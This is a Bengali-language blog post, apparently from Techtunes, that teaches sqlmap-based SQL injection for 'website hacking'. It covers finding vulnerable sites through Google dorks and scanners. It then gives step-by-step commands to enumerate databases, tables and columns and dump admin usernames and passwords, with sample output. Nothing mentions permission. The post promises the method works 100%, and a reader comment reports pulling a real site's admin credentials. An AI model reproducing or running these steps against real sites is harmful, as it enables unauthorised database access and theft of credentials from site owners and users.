আসসালামু আলাইকুম !! কেমন আছেন সবাই ? আমি Emran আছি আপনাদের সাথে !! আজ আমরা শিখবো Sqlmap দিয়ে কিভাবে auto SQL injection করে ওয়েবসাইট এর ডাটাবেস থেকে এডমিন এর ইউজার নেম এবং পাসওয়ার্ড বের করতে হয় !
ওয়েবসাইট হ্যাকিং এর অন্যতম জনপ্রিয় পদ্ধতি হল SQL Injection !
আজকে আপনাদের দেখাবো Sqlmap এর কাজ ! যা কালি লিনাক্সে আগে থেকেই বিদ্যমান ! কোনো সাইট SQL Injection এর যোগ্য কিনা তা জানতে Kali Linux এর ক্ষেত্রে Vega,Power Fuzzar ব্যবহার করতে পারেন !
অথবা গুগল ডর্ক ব্যবহার করতে পারেন !!
আচ্ছা ধরেন আপনি একটা ওয়েবসাইট পেয়েছেন যেটা SQL Injection এর যোগ্য ! ঊপরের সফটওয়্যার গুলু বলে দিবে আপনাকে যে ঐ ওয়েবসাইট এর কোন লিঙ্কটা Vulnerable !
তাহলে ঐ ওয়েবসাইট এর Link টা হবে এমন : http://www.yoursite.com/index.php?id=32 !
এখন আপনার কাজ হল কালি লিনাক্স ওপেন করে টার্মিনাল ওপেন করা ! প্রথমে আমরা ডাটাবেস বের করব তারপর টেবিল তারপর কলাম তারপর সেগুলু দেখব ডাম্প করার মাধ্যমে !
তাহলে আমরা টার্মিনালে লিখবঃ sqlmap -u http://www.yoursite.com/index.php?id=32 --dbs
তারপর
আপনার কাছে কিছু জানতে চাইতে পারে ! ভালভাবে পড়ে দেখুন কি জানতে চাচ্ছে ! যদি না বুঝেন সমস্যা নাই ! লাইন এর লাস্টে দেখুন (Y/n) অথবা (y/N) এমন আসবে ! যেটা বড় হাতের হবে সেটা লিখুন !
উদাহরন ১ : Scan all directory (Y/n) Y বড় হাতের তাহলে Y লিখে Enter চাপুন !
উদাহরন ২ : Cancle Scane (y/N) N বড় হাতের তাহলে N লিখে Enter চাপুন !
কিছুক্ষন কাজ হবে ! তারপর আপনার সামনে হাজির হবে ঐ ওয়েবসাইট এর ডাটাবেস !
এমন :
*information_schema
*yoursite
তারপর
আমরা টার্মিনালে লিখবঃ
sqlmap -u http://www.yoursite.com/index.php?id=32 -D yoursite --tables
ভেঙ্গে বলতে হবে ??
টেবিল পাবো এমন :
user
files
admin
তারপর
আমরা টার্মিনালে লিখবঃ
sqlmap -u http://www.yoursite.com/index.php?id=32 -D yoursite -T admin --columns
কলাম পাবো এমন :
admin_username
admin_password
তারপর
আমরা টার্মিনালে লিখবঃ
sqlmap -u http://www.yoursite.com/index.php?id=32 -D yoursite -T admin -C admin_username --dump
[ Username ]
[ ]
[ BOLOD ]
[ ]
একই ভাবে পাসওয়ার্ড বের করব :
আমরা টার্মিনালে লিখবঃ
sqlmap -u http://www.yoursite.com/index.php?id=32 -D yoursite -T admin -C admin_password --dump
[ Password ]
[ ]
[ 123456 ]
[ ]
কারো প্রশ্ন থাকলে করতে পারেন ! আর অনেকেই বলবেন হাভিঝ দিয়ে ইজি ! কিন্তু হাভিঝ দিয়ে অনেক সাইট এর ডাটাবেস আসে না ঝামেলা করে !
এটা একদম নতুনদের জন্য নয় ! আর ট্রাই না করে " কাজ করে না এই সেই " টিউমেন্ট করবেন না দয়া করে ! আগে ট্রাই করুন ১০০% কাজ করবে !
আমাকে ফেসবুকে ফলো করতে পারেন : Emran সবাইকে ধন্যবাদ !
Do Not Copy ! Copying Don't Make You Writer ! 😉
কেমন লাগলো জানাবেন !! ধন্যবাদ !
আমি ইমরান হোসাইন। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 9 বছর 5 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 13 টি টিউন ও 46 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 2 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
আসসালামু-আলাইকুম ! আমি মোঃ ইমরান হোসাইন । আমি University Of Asia Pacific এ CSE তে পড়ি ! হ্যাকিং - ক্র্যাকিং নিয়ে আমার খুব আগ্রহ সেই থেকে আপনাদের জন্য আমার লিখা (আমি হ্যাকার না ) ! শুধুই একজন শিক্ষার্থী ! যাদের এসব আমার মতো ভালো লাগে তারা আমার পোষ্ট নিয়মিত পড়বেন...
কাজ করে। আমি একটা সাইটের অ্যাডমিনের ইউজারনেরম আর পাসওয়ার্ড বের করেছিলাম, কিন্তু কিভাবে সাইটে লগইন করব সেটাই বুঝতে পারছিলাম না
thanks i will try it